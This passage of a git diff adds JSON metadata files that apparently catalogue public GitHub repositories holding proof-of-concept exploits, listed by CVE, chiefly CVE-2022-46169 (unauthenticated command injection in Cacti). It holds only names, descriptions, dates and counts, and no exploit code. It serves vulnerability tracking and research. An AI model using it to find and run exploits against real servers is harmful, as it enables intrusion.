+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46166.json b/2022/CVE-2022-46166.json
new file mode 100644
index 0000000000..ce8cd37701
--- /dev/null
+++ b/2022/CVE-2022-46166.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 599959676,
+ "name": "CVE-2022-46166",
+ "full_name": "DickDock\/CVE-2022-46166",
+ "owner": {
+ "login": "DickDock",
+ "id": 45897719,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45897719?v=4",
+ "html_url": "https:\/\/github.com\/DickDock"
+ },
+ "html_url": "https:\/\/github.com\/DickDock\/CVE-2022-46166",
+ "description": "CVE-2022-46166 靶场环境",
+ "fork": false,
+ "created_at": "2023-02-10T09:06:34Z",
+ "updated_at": "2023-11-14T16:13:35Z",
+ "pushed_at": "2023-02-10T09:15:44Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46169.json b/2022/CVE-2022-46169.json
index 8dabd0d8b9..e2dcf2502f 100644
--- a/2022/CVE-2022-46169.json
+++ b/2022/CVE-2022-46169.json
@@ -89,6 +89,449 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 584490516,
+ "name": "CVE-2022-46169",
+ "full_name": "Inplex-sys\/CVE-2022-46169",
+ "owner": {
+ "login": "Inplex-sys",
+ "id": 69421356,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4",
+ "html_url": "https:\/\/github.com\/Inplex-sys"
+ },
+ "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-46169",
+ "description": "Cacti Unauthenticated Command Injection",
+ "fork": false,
+ "created_at": "2023-01-02T18:03:26Z",
+ "updated_at": "2023-03-11T00:41:32Z",
+ "pushed_at": "2023-01-02T18:05:45Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cacti",
+ "cve",
+ "hgrab-framework",
+ "poc",
+ "rce",
+ "scanner",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 585629170,
+ "name": "CVE-2022-46169",
+ "full_name": "sAsPeCt488\/CVE-2022-46169",
+ "owner": {
+ "login": "sAsPeCt488",
+ "id": 55363474,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55363474?v=4",
+ "html_url": "https:\/\/github.com\/sAsPeCt488"
+ },
+ "html_url": "https:\/\/github.com\/sAsPeCt488\/CVE-2022-46169",
+ "description": "PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22",
+ "fork": false,
+ "created_at": "2023-01-05T16:56:06Z",
+ "updated_at": "2023-12-06T21:51:12Z",
+ "pushed_at": "2023-05-05T18:06:58Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cacti",
+ "cve-2022-46169",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 588437634,
+ "name": "CVE-2022-46169",
+ "full_name": "c3rrberu5\/CVE-2022-46169",
+ "owner": {
+ "login": "c3rrberu5",
+ "id": 109983457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4",
+ "html_url": "https:\/\/github.com\/c3rrberu5"
+ },
+ "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2022-46169",
+ "description": "Exploit to CVE-2022-46169 vulnerability",
+ "fork": false,
+ "created_at": "2023-01-13T05:37:56Z",
+ "updated_at": "2024-06-06T21:53:35Z",
+ "pushed_at": "2023-01-16T23:14:04Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 589360535,
+ "name": "CVE-2022-46169",
+ "full_name": "Habib0x0\/CVE-2022-46169",
+ "owner": {
+ "login": "Habib0x0",
+ "id": 24976957,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4",
+ "html_url": "https:\/\/github.com\/Habib0x0"
+ },
+ "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2022-46169",
+ "description": "Cacti: Unauthenticated Remote Code Execution Exploit in Ruby ",
+ "fork": false,
+ "created_at": "2023-01-15T22:46:52Z",
+ "updated_at": "2023-02-13T09:30:29Z",
+ "pushed_at": "2023-01-20T07:10:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 589524043,
+ "name": "CVE-2022-46169_POC",
+ "full_name": "N1arut\/CVE-2022-46169_POC",
+ "owner": {
+ "login": "N1arut",
+ "id": 41994914,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41994914?v=4",
+ "html_url": "https:\/\/github.com\/N1arut"
+ },
+ "html_url": "https:\/\/github.com\/N1arut\/CVE-2022-46169_POC",
+ "description": "RCE POC for CVE-2022-46169",
+ "fork": false,
+ "created_at": "2023-01-16T10:21:26Z",
+ "updated_at": "2023-10-08T20:21:44Z",
+ "pushed_at": "2023-01-17T16:32:46Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 596690527,
+ "name": "CVE-2022-46169",
+ "full_name": "miko550\/CVE-2022-46169",
+ "owner": {
+ "login": "miko550",
+ "id": 83682793,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4",
+ "html_url": "https:\/\/github.com\/miko550"
+ },
+ "html_url": "https:\/\/github.com\/miko550\/CVE-2022-46169",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-02T18:21:08Z",
+ "updated_at": "2023-02-02T18:25:02Z",
+ "pushed_at": "2023-02-02T18:42:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 612724556,
+ "name": "cacti-cve-2022-46169-exploit",
+ "full_name": "ariyaadinatha\/cacti-cve-2022-46169-exploit",
+ "owner": {
+ "login": "ariyaadinatha",
+ "id": 54601298,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54601298?v=4",
+ "html_url": "https:\/\/github.com\/ariyaadinatha"
+ },
+ "html_url": "https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit",
+ "description": "This is poc of CVE-2022-46169 authentication bypass and remote code execution",
+ "fork": false,
+ "created_at": "2023-03-11T19:39:44Z",
+ "updated_at": "2023-11-22T00:03:33Z",
+ "pushed_at": "2023-05-18T19:06:36Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 616701865,
+ "name": "CVE-2022-46169",
+ "full_name": "doosec101\/CVE-2022-46169",
+ "owner": {
+ "login": "doosec101",
+ "id": 128431701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4",
+ "html_url": "https:\/\/github.com\/doosec101"
+ },
+ "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-46169",
+ "description": "Repo for CVE-2022-46169",
+ "fork": false,
+ "created_at": "2023-03-20T22:54:18Z",
+ "updated_at": "2023-03-20T23:57:27Z",
+ "pushed_at": "2023-03-21T04:56:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 622325901,
+ "name": "cacti-rce-cve-2022-46169-vulnerable-application",
+ "full_name": "m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application",
+ "owner": {
+ "login": "m3ssap0",
+ "id": 705120,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4",
+ "html_url": "https:\/\/github.com\/m3ssap0"
+ },
+ "html_url": "https:\/\/github.com\/m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application",
+ "description": "WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it at your own risk!",
+ "fork": false,
+ "created_at": "2023-04-01T19:20:29Z",
+ "updated_at": "2023-09-22T17:23:40Z",
+ "pushed_at": "2023-04-03T11:01:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cacti",
+ "command-injection",
+ "cve-2022-46169",
+ "rce",
+ "vulnerable-application"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 622368239,
+ "name": "CVE-2022-46169_poc",
+ "full_name": "devAL3X\/CVE-2022-46169_poc",
+ "owner": {
+ "login": "devAL3X",
+ "id": 40294005,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40294005?v=4",
+ "html_url": "https:\/\/github.com\/devAL3X"
+ },
+ "html_url": "https:\/\/github.com\/devAL3X\/CVE-2022-46169_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-01T22:37:37Z",
+ "updated_at": "2023-04-01T22:37:46Z",
+ "pushed_at": "2023-04-13T15:18:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 625050292,
+ "name": "CVE-2022-46169_unauth_remote_code_execution",
+ "full_name": "JacobEbben\/CVE-2022-46169_unauth_remote_code_execution",
+ "owner": {
+ "login": "JacobEbben",
+ "id": 112503338,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4",
+ "html_url": "https:\/\/github.com\/JacobEbben"
+ },
+ "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46169_unauth_remote_code_execution",
+ "description": "Unauthenticated Remote Code Execution through authentication bypass and command injection in Cacti < 1.2.23 and < 1.3.0",
+ "fork": false,
+ "created_at": "2023-04-07T23:40:53Z",
+ "updated_at": "2023-05-13T16:45:25Z",
+ "pushed_at": "2023-04-09T11:02:59Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 627335815,
+ "name": "CVE-2022-46169",
+ "full_name": "icebreack\/CVE-2022-46169",
+ "owner": {
+ "login": "icebreack",
+ "id": 6855402,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6855402?v=4",
+ "html_url": "https:\/\/github.com\/icebreack"
+ },
+ "html_url": "https:\/\/github.com\/icebreack\/CVE-2022-46169",
+ "description": "Fixed exploit for CVE-2022-46169 (originally from https:\/\/www.exploit-db.com\/exploits\/51166)",
+ "fork": false,
+ "created_at": "2023-04-13T08:55:08Z",
+ "updated_at": "2023-04-14T17:26:04Z",
+ "pushed_at": "2023-04-13T08:55:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 634367688,
+ "name": "CVE-2022-46169",
+ "full_name": "devilgothies\/CVE-2022-46169",
+ "owner": {
+ "login": "devilgothies",
+ "id": 104858033,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104858033?v=4",
+ "html_url": "https:\/\/github.com\/devilgothies"
+ },
+ "html_url": "https:\/\/github.com\/devilgothies\/CVE-2022-46169",
+ "description": "PoC for CVE-2022-46169 that affects Cacti 1.2.22 version",
+ "fork": false,
+ "created_at": "2023-04-29T22:14:17Z",
+ "updated_at": "2023-04-29T22:28:21Z",
+ "pushed_at": "2023-04-29T22:25:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cacti",
+ "cve-2022-46169",
+ "poc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 634502064,
+ "name": "CVE-2022-46169",
+ "full_name": "yassinebk\/CVE-2022-46169",
+ "owner": {
+ "login": "yassinebk",
+ "id": 62627838,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62627838?v=4",
+ "html_url": "https:\/\/github.com\/yassinebk"
+ },
+ "html_url": "https:\/\/github.com\/yassinebk\/CVE-2022-46169",
+ "description": "CVE-2022-46169",
+ "fork": false,
+ "created_at": "2023-04-30T10:37:44Z",
+ "updated_at": "2023-04-30T10:37:52Z",
+ "pushed_at": "2023-04-30T10:37:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 634912432,
"name": "CVE-2022-46169",
@@ -149,6 +592,196 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 635123796,
+ "name": "RCE-Cacti-1.2.22",
+ "full_name": "sha-16\/RCE-Cacti-1.2.22",
+ "owner": {
+ "login": "sha-16",
+ "id": 89037170,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89037170?v=4",
+ "html_url": "https:\/\/github.com\/sha-16"
+ },
+ "html_url": "https:\/\/github.com\/sha-16\/RCE-Cacti-1.2.22",
+ "description": "Este es un código del exploit CVE-2022-46169, que recree utilizando Python3! Si por ahí estás haciendo una máquina de HTB, esto te puede ser útil... 🤞✨ ",
+ "fork": false,
+ "created_at": "2023-05-02T02:41:44Z",
+ "updated_at": "2023-05-02T02:43:30Z",
+ "pushed_at": "2023-05-02T03:36:03Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 635433764,
+ "name": "CVE-2022-46169",
+ "full_name": "Safarchand\/CVE-2022-46169",
+ "owner": {
+ "login": "Safarchand",
+ "id": 38681779,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38681779?v=4",
+ "html_url": "https:\/\/github.com\/Safarchand"
+ },
+ "html_url": "https:\/\/github.com\/Safarchand\/CVE-2022-46169",
+ "description": "Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169",
+ "fork": false,
+ "created_at": "2023-05-02T17:26:11Z",
+ "updated_at": "2023-05-04T17:07:23Z",
+ "pushed_at": "2023-05-02T17:50:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cacti-rce",
+ "cve-2022-46169",
+ "poc",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 635946571,
+ "name": "CVE-2022-46169",
+ "full_name": "MarkStrendin\/CVE-2022-46169",
+ "owner": {
+ "login": "MarkStrendin",
+ "id": 638560,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/638560?v=4",
+ "html_url": "https:\/\/github.com\/MarkStrendin"
+ },
+ "html_url": "https:\/\/github.com\/MarkStrendin\/CVE-2022-46169",
+ "description": "Proof of concept \/ CTF script for exploiting CVE-2022-46169 in Cacti, versions >=1.2.22",
+ "fork": false,
+ "created_at": "2023-05-03T19:53:01Z",
+ "updated_at": "2023-05-03T19:54:22Z",
+ "pushed_at": "2023-05-03T19:56:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 636441307,
+ "name": "CVE-2022-46169",
+ "full_name": "BKreisel\/CVE-2022-46169",
+ "owner": {
+ "login": "BKreisel",
+ "id": 1513073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4",
+ "html_url": "https:\/\/github.com\/BKreisel"
+ },
+ "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-46169",
+ "description": "🐍 Python Exploit for CVE-2022-46169",
+ "fork": false,
+ "created_at": "2023-05-04T21:21:05Z",
+ "updated_at": "2023-05-04T22:04:32Z",
+ "pushed_at": "2023-05-04T22:03:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-46169",
+ "exploit",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 640014872,
+ "name": "EH2-PoC",
+ "full_name": "Rickster5555\/EH2-PoC",
+ "owner": {
+ "login": "Rickster5555",
+ "id": 92229061,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92229061?v=4",
+ "html_url": "https:\/\/github.com\/Rickster5555"
+ },
+ "html_url": "https:\/\/github.com\/Rickster5555\/EH2-PoC",
+ "description": "A simple PoC for CVE-2022-46169 a.k.a Cacti Unauthenticated Command Injection, a vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22",
+ "fork": false,
+ "created_at": "2023-05-12T19:08:45Z",
+ "updated_at": "2023-05-12T19:29:22Z",
+ "pushed_at": "2023-05-15T02:36:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 643437445,
+ "name": "CVE-2022-46169",
+ "full_name": "antisecc\/CVE-2022-46169",
+ "owner": {
+ "login": "antisecc",
+ "id": 92209707,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4",
+ "html_url": "https:\/\/github.com\/antisecc"
+ },
+ "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-46169",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-21T06:43:17Z",
+ "updated_at": "2023-05-21T06:44:18Z",
+ "pushed_at": "2023-05-21T06:48:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 673282845,
"name": "CVE-2022-46169",
diff --git a/2022/CVE-2022-46175.json b/2022/CVE-2022-46175.json
new file mode 100644
index 0000000000..3d00c81c56
--- /dev/null
+++ b/2022/CVE-2022-46175.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 587725691,
+ "name": "quasar-app-webpack-json5-vulnerability",
+ "full_name": "giz-berlin\/quasar-app-webpack-json5-vulnerability",
+ "owner": {
+ "login": "giz-berlin",
+ "id": 82261342,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82261342?v=4",
+ "html_url": "https:\/\/github.com\/giz-berlin"
+ },
+ "html_url": "https:\/\/github.com\/giz-berlin\/quasar-app-webpack-json5-vulnerability",
+ "description": "Reproduction for CVE-2022-46175",
+ "fork": false,
+ "created_at": "2023-01-11T12:48:17Z",
+ "updated_at": "2023-05-08T07:15:54Z",
+ "pushed_at": "2023-01-11T12:48:32Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46196.json b/2022/CVE-2022-46196.json
new file mode 100644
index 0000000000..546ecf8d5e
--- /dev/null
+++ b/2022/CVE-2022-46196.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 634625371,
+ "name": "CVE-2022-46196",
+ "full_name": "dpgg101\/CVE-2022-46196",
+ "owner": {
+ "login": "dpgg101",
+ "id": 16139822,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16139822?v=4",
+ "html_url": "https:\/\/github.com\/dpgg101"
+ },
+ "html_url": "https:\/\/github.com\/dpgg101\/CVE-2022-46196",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-30T18:23:41Z",
+ "updated_at": "2023-09-02T15:53:16Z",
+ "pushed_at": "2023-04-30T18:31:25Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46463.json b/2022/CVE-2022-46463.json
new file mode 100644
index 0000000000..7dd940eb77
--- /dev/null
+++ b/2022/CVE-2022-46463.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 590053195,
+ "name": "CVE-2022-46463",
+ "full_name": "nu0l\/CVE-2022-46463",
+ "owner": {
+ "login": "nu0l",
+ "id": 54735907,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54735907?v=4",
+ "html_url": "https:\/\/github.com\/nu0l"
+ },
+ "html_url": "https:\/\/github.com\/nu0l\/CVE-2022-46463",
+ "description": "CVE-2022-46463(Harbor 未授权)",
+ "fork": false,
+ "created_at": "2023-01-17T14:58:14Z",
+ "updated_at": "2024-05-15T13:25:34Z",
+ "pushed_at": "2023-01-19T12:47:21Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 616913153,
+ "name": "CVE-2022-46463",
+ "full_name": "404tk\/CVE-2022-46463",
+ "owner": {
+ "login": "404tk",
+ "id": 54827262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54827262?v=4",
+ "html_url": "https:\/\/github.com\/404tk"
+ },
+ "html_url": "https:\/\/github.com\/404tk\/CVE-2022-46463",
+ "description": "harbor unauthorized detection",
+ "fork": false,
+ "created_at": "2023-03-21T10:40:19Z",
+ "updated_at": "2024-06-26T01:29:18Z",
+ "pushed_at": "2023-03-28T04:23:42Z",
+ "stargazers_count": 15,
+ "watchers_count": 15,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 15,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46505.json b/2022/CVE-2022-46505.json
new file mode 100644
index 0000000000..bc1e79a70b
--- /dev/null
+++ b/2022/CVE-2022-46505.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 588404620,
+ "name": "details-for-CVE-2022-46505",
+ "full_name": "SmallTown123\/details-for-CVE-2022-46505",
+ "owner": {
+ "login": "SmallTown123",
+ "id": 101922357,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101922357?v=4",
+ "html_url": "https:\/\/github.com\/SmallTown123"
+ },
+ "html_url": "https:\/\/github.com\/SmallTown123\/details-for-CVE-2022-46505",
+ "description": "MatrixSSL session resume bug",
+ "fork": false,
+ "created_at": "2023-01-13T03:07:52Z",
+ "updated_at": "2023-01-13T03:07:52Z",
+ "pushed_at": "2023-01-13T03:38:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46604.json b/2022/CVE-2022-46604.json
new file mode 100644
index 0000000000..aae4affdbe
--- /dev/null
+++ b/2022/CVE-2022-46604.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 596935402,
+ "name": "ResponsiveFileManager-CVE-2022-46604",
+ "full_name": "galoget\/ResponsiveFileManager-CVE-2022-46604",
+ "owner": {
+ "login": "galoget",
+ "id": 8353133,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8353133?v=4",
+ "html_url": "https:\/\/github.com\/galoget"
+ },
+ "html_url": "https:\/\/github.com\/galoget\/ResponsiveFileManager-CVE-2022-46604",
+ "description": "Responsive FileManager v.9.9.5 vulnerable to CVE-2022-46604.",
+ "fork": false,
+ "created_at": "2023-02-03T08:56:16Z",
+ "updated_at": "2024-05-20T03:36:32Z",
+ "pushed_at": "2023-04-09T23:34:28Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "python3",
+ "responsivefilemanager"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46622.json b/2022/CVE-2022-46622.json
new file mode 100644
index 0000000000..e210744b72
--- /dev/null
+++ b/2022/CVE-2022-46622.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 585254254,
+ "name": "CVE-2022-46622",
+ "full_name": "sudoninja-noob\/CVE-2022-46622",
+ "owner": {
+ "login": "sudoninja-noob",
+ "id": 18701598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4",
+ "html_url": "https:\/\/github.com\/sudoninja-noob"
+ },
+ "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-46622",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-04T17:52:13Z",
+ "updated_at": "2023-01-04T17:52:13Z",
+ "pushed_at": "2023-01-04T17:52:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-46623.json b/2022/CVE-2022-46623.json
new file mode 100644
index 0000000000..627131f9cc
--- /dev/null
